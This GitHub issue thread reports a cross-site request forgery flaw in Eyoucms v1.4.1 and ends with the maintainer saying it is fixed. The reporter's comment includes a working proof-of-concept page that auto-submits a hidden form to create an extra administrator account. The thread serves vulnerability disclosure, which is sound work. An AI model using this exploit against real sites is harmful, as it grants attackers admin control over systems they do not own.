### ISSUE TITLE
A CSRF vulnerability exist in eyoucms 1.4.1 that can add an admin account

### ISSUE THREAD

**Issue by my123px** [weng-xianhu/eyoucms#10]
An issue was discovered in Eyoucms v1.4.1
There is a CSRF vulnerability that can add an admin account via login.php?m=admin&c=Admin&a=admin_add&lang=cn
After the admin logged in, open the csrf exp page.
![image](https://user-images.githubusercontent.com/33975676/72328610-3060fb80-36ee-11ea-8085-80eaf0cc542e.png)
Click "Submit request" and found that the admin2 user was successfully added
![image](https://user-images.githubusercontent.com/33975676/72328659-4a024300-36ee-11ea-93d3-c1f7de30e9b1.png)
![image](https://user-images.githubusercontent.com/33975676/72328671-4f5f8d80-36ee-11ea-983a-85369a8fff87.png)

This issue has been discovered since Eyoucms v1.3.6, and has not been fixed so far (v1.4.1)

**Comment by my123px** [comment]
An issue was discovered in Eyoucms v1.4.1
There is a CSRF vulnerability that can add an admin account via login.php?m=admin&c=Admin&a=admin_add&lang=cn
After the admin logged in, open the csrf exp page.
`<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.4/login.php?m=admin&c=Admin&a=admin_add&lang=cn" method="POST">
      <input type="hidden" name="user&#95;name" value="admin2" />
      <input type="hidden" name="password" value="111111" />
      <input type="hidden" name="password2" value="111111" />
      <input type="hidden" name="pen&#95;name" value="" />
      <input type="hidden" name="true&#95;name" value="" />
      <input type="hidden" name="mobile" value="" />
      <input type="hidden" name="role&#95;id" value="&#45;1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
`
![image](https://user-images.githubusercontent.com/33975676/72327736-a2384580-36ec-11ea-822c-6c1be248b547.png)
![image](https://user-images.githubusercontent.com/33975676/72327749-aa908080-36ec-11ea-9d2b-16a2148c699a.png)
This issue has been discovered since Eyoucms v1.3.6, and has not been fixed so far (v1.4.1)

**Comment by weng-xianhu** [comment]
已修复
